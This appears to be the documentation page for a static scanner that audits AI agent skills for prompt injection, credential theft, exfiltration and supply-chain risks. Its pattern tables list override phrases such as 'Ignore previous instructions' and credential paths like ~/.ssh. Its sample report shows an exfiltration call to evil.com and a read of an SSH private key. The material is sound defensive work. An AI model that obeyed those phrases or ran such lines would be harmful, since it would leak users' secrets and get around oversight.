Skill Security Auditor
Scan and audit AI agent skills for security risks before installation. Produces a
clear PASS / WARN / FAIL verdict with findings and remediation guidance.
Quick Start
# Audit a local skill directory
python3 scripts/skill_security_auditor.py /path/to/skill-name/
# Audit a skill from a git repo
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name
# Audit with strict mode (any WARN becomes FAIL)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict
# Output JSON report
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json
What Gets Scanned
1. Code Execution Risks (Python/Bash Scripts)
Scans all .py, .sh, .bash, .js, .ts files for:
| Category |
Patterns Detected |
Severity |
| Command injection |
os.system(), os.popen(), subprocess.call(shell=True), backtick execution |
🔴 CRITICAL |
| Code execution |
eval(), exec(), compile(), __import__() |
🔴 CRITICAL |
| Obfuscation |
base64-encoded payloads, codecs.decode, hex-encoded strings, chr() chains |
🔴 CRITICAL |
| Network exfiltration |
requests.post(), urllib.request, socket.connect(), httpx, aiohttp |
🔴 CRITICAL |
| Credential harvesting |
reads from ~/.ssh, ~/.aws, ~/.config, env var extraction patterns |
🔴 CRITICAL |
| File system abuse |
writes outside skill dir, /etc/, ~/.bashrc, ~/.profile, symlink creation |
🟡 HIGH |
| Privilege escalation |
sudo, chmod 777, setuid, cron manipulation |
🔴 CRITICAL |
| Unsafe deserialization |
pickle.loads(), yaml.load() (without SafeLoader), marshal.loads() |
🟡 HIGH |
| Subprocess (safe) |
subprocess.run() with list args, no shell |
⚪ INFO |
2. Prompt Injection in SKILL.md
Scans SKILL.md and all .md reference files for:
| Pattern |
Example |
Severity |
| System prompt override |
"Ignore previous instructions", "You are now..." |
🔴 CRITICAL |
| Role hijacking |
"Act as root", "Pretend you have no restrictions" |
🔴 CRITICAL |
| Safety bypass |
"Skip safety checks", "Disable content filtering" |
🔴 CRITICAL |
| Hidden instructions |
Zero-width characters, HTML comments with directives |
🟡 HIGH |
| Excessive permissions |
"Run any command", "Full filesystem access" |
🟡 HIGH |
| Data extraction |
"Send contents of", "Upload file to", "POST to" |
🔴 CRITICAL |
3. Dependency Supply Chain
For skills with requirements.txt, package.json, or inline pip install:
| Check |
What It Does |
Severity |
| Known vulnerabilities |
Cross-reference with PyPI/npm advisory databases |
🔴 CRITICAL |
| Typosquatting |
Flag packages similar to popular ones (e.g., reqeusts) |
🟡 HIGH |
| Unpinned versions |
Flag requests>=2.0 vs requests==2.31.0 |
⚪ INFO |
| Install commands in code |
pip install or npm install inside scripts |
🟡 HIGH |
| Suspicious packages |
Low download count, recent creation, single maintainer |
⚪ INFO |
4. File System & Structure
| Check |
What It Does |
Severity |
| Boundary violation |
Scripts referencing paths outside skill directory |
🟡 HIGH |
| Hidden files |
.env, dotfiles that shouldn't be in a skill |
🟡 HIGH |
| Binary files |
Unexpected executables, .so, .dll, .exe |
🔴 CRITICAL |
| Large files |
Files >1MB that could hide payloads |
⚪ INFO |
| Symlinks |
Symbolic links pointing outside skill directory |
🔴 CRITICAL |
Audit Workflow
- Run the scanner on the skill directory or repo URL
- Review the report — findings grouped by severity
- Verdict interpretation:
- ✅ PASS — No critical or high findings. Safe to install.
- ⚠️ WARN — High/medium findings detected. Review manually before installing.
- ❌ FAIL — Critical findings. Do NOT install without remediation.
- Remediation — each finding includes specific fix guidance
Reading the Report
╔══════════════════════════════════════════════╗
║ SKILL SECURITY AUDIT REPORT ║
║ Skill: example-skill ║
║ Verdict: ❌ FAIL ║
╠══════════════════════════════════════════════╣
║ 🔴 CRITICAL: 2 🟡 HIGH: 1 ⚪ INFO: 3 ║
╚══════════════════════════════════════════════╝
🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
Pattern: eval(user_input)
Risk: Arbitrary code execution from untrusted input
Fix: Replace eval() with ast.literal_eval() or explicit parsing
🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
Pattern: requests.post("https://evil.com/collect", data=results)
Risk: Data exfiltration to external server
Fix: Remove outbound network calls or verify destination is trusted
🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
Pattern: open(os.path.expanduser("~/.ssh/id_rsa")) <!-- noqa: SEC-AUDITOR -->
Risk: Reads SSH private key outside skill scope
Fix: Remove filesystem access outside skill directory
⚪ INFO [DEPS-UNPIN] requirements.txt:3
Pattern: requests>=2.0
Risk: Unpinned dependency may introduce vulnerabilities
Fix: Pin to specific version: requests==2.31.0
Advanced Usage
Audit a Skill from Git Before Cloning
# Clone to temp dir, audit, then clean up
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup
CI/CD Integration
# GitHub Actions step
- name: "audit-skill-security"
run: |
python3 scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi
Batch Audit
# Audit all skills in a directory
for skill in skills/*/; do
python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done
Threat Model Reference
For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see references/threat-model.md.
Limitations
- Cannot detect logic bombs or time-delayed payloads with certainty
- Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
- Network destination reputation checks require internet access
- Does not execute code — static analysis only (safe but less complete than dynamic analysis)
- Dependency vulnerability checks use local pattern matching, not live CVE databases
When in doubt after an audit, don't install. Ask the skill author for clarification.
1---2name: skill-security-auditor3description: Audit external agent skills before installation for malicious instructions, unsafe scripts, excessive permissions, dependency risks, and data exfiltration.4license: MIT5---6
7# Skill Security Auditor
8
9Scan and audit AI agent skills for security risks before installation. Produces a
10clear **PASS / WARN / FAIL** verdict with findings and remediation guidance.
11
12## Quick Start
13
14```bash
15# Audit a local skill directory
16python3 scripts/skill_security_auditor.py /path/to/skill-name/
17
18# Audit a skill from a git repo
19python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name
20
21# Audit with strict mode (any WARN becomes FAIL)
22python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict
23
24# Output JSON report
25python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json
26```
27
28## What Gets Scanned
29
30### 1. Code Execution Risks (Python/Bash Scripts)
31
32Scans all `.py`, `.sh`, `.bash`, `.js`, `.ts` files for:
33
34| Category | Patterns Detected | Severity |
35|----------|-------------------|----------|
36| **Command injection** | `os.system()`, `os.popen()`, `subprocess.call(shell=True)`, backtick execution | 🔴 CRITICAL |
37| **Code execution** | `eval()`, `exec()`, `compile()`, `__import__()` | 🔴 CRITICAL |
38| **Obfuscation** | base64-encoded payloads, `codecs.decode`, hex-encoded strings, `chr()` chains | 🔴 CRITICAL |
39| **Network exfiltration** | `requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp` | 🔴 CRITICAL |
40| **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL |
41| **File system abuse** | writes outside skill dir, `/etc/`, `~/.bashrc`, `~/.profile`, symlink creation | 🟡 HIGH |
42| **Privilege escalation** | `sudo`, `chmod 777`, `setuid`, cron manipulation | 🔴 CRITICAL |
43| **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH |
44| **Subprocess (safe)** | `subprocess.run()` with list args, no shell | ⚪ INFO |
45
46### 2. Prompt Injection in SKILL.md
47
48Scans SKILL.md and all `.md` reference files for:
49
50| Pattern | Example | Severity |
51|---------|---------|----------|
52| **System prompt override** | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
53| **Role hijacking** | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
54| **Safety bypass** | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
55| **Hidden instructions** | Zero-width characters, HTML comments with directives | 🟡 HIGH |
56| **Excessive permissions** | "Run any command", "Full filesystem access" | 🟡 HIGH |
57| **Data extraction** | "Send contents of", "Upload file to", "POST to" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
58
59### 3. Dependency Supply Chain
60
61For skills with `requirements.txt`, `package.json`, or inline `pip install`:
62
63| Check | What It Does | Severity |
64|-------|-------------|----------|
65| **Known vulnerabilities** | Cross-reference with PyPI/npm advisory databases | 🔴 CRITICAL |
66| **Typosquatting** | Flag packages similar to popular ones (e.g., `reqeusts`) | 🟡 HIGH |
67| **Unpinned versions** | Flag `requests>=2.0` vs `requests==2.31.0` | ⚪ INFO |
68| **Install commands in code** | `pip install` or `npm install` inside scripts | 🟡 HIGH |
69| **Suspicious packages** | Low download count, recent creation, single maintainer | ⚪ INFO |
70
71### 4. File System & Structure
72
73| Check | What It Does | Severity |
74|-------|-------------|----------|
75| **Boundary violation** | Scripts referencing paths outside skill directory | 🟡 HIGH |
76| **Hidden files** | `.env`, dotfiles that shouldn't be in a skill | 🟡 HIGH |
77| **Binary files** | Unexpected executables, `.so`, `.dll`, `.exe` | 🔴 CRITICAL |
78| **Large files** | Files >1MB that could hide payloads | ⚪ INFO |
79| **Symlinks** | Symbolic links pointing outside skill directory | 🔴 CRITICAL |
80
81## Audit Workflow
82
831. **Run the scanner** on the skill directory or repo URL
842. **Review the report** — findings grouped by severity
853. **Verdict interpretation:**
86 - **✅ PASS** — No critical or high findings. Safe to install.
87 - **⚠️ WARN** — High/medium findings detected. Review manually before installing.
88 - **❌ FAIL** — Critical findings. Do NOT install without remediation.
894. **Remediation** — each finding includes specific fix guidance
90
91## Reading the Report
92
93```
94╔══════════════════════════════════════════════╗
95║ SKILL SECURITY AUDIT REPORT ║
96║ Skill: example-skill ║
97║ Verdict: ❌ FAIL ║
98╠══════════════════════════════════════════════╣
99║ 🔴 CRITICAL: 2 🟡 HIGH: 1 ⚪ INFO: 3 ║
100╚══════════════════════════════════════════════╝
101
102🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
103 Pattern: eval(user_input)
104 Risk: Arbitrary code execution from untrusted input
105 Fix: Replace eval() with ast.literal_eval() or explicit parsing
106
107🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
108 Pattern: requests.post("https://evil.com/collect", data=results)
109 Risk: Data exfiltration to external server
110 Fix: Remove outbound network calls or verify destination is trusted
111
112🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
113 Pattern: open(os.path.expanduser("~/.ssh/id_rsa")) <!-- noqa: SEC-AUDITOR -->
114 Risk: Reads SSH private key outside skill scope
115 Fix: Remove filesystem access outside skill directory
116
117⚪ INFO [DEPS-UNPIN] requirements.txt:3
118 Pattern: requests>=2.0
119 Risk: Unpinned dependency may introduce vulnerabilities
120 Fix: Pin to specific version: requests==2.31.0
121```
122
123## Advanced Usage
124
125### Audit a Skill from Git Before Cloning
126
127```bash
128# Clone to temp dir, audit, then clean up
129python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup
130```
131
132### CI/CD Integration
133
134```yaml
135# GitHub Actions step
136- name: "audit-skill-security"
137 run: |
138 python3 scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
139 if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi
140```
141
142### Batch Audit
143
144```bash
145# Audit all skills in a directory
146for skill in skills/*/; do
147 python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
148done
149```
150
151## Threat Model Reference
152
153For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see [references/threat-model.md](references/threat-model.md).
154
155## Limitations
156
157- Cannot detect logic bombs or time-delayed payloads with certainty
158- Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
159- Network destination reputation checks require internet access
160- Does not execute code — static analysis only (safe but less complete than dynamic analysis)
161- Dependency vulnerability checks use local pattern matching, not live CVE databases
162
163When in doubt after an audit, **don't install**. Ask the skill author for clarification.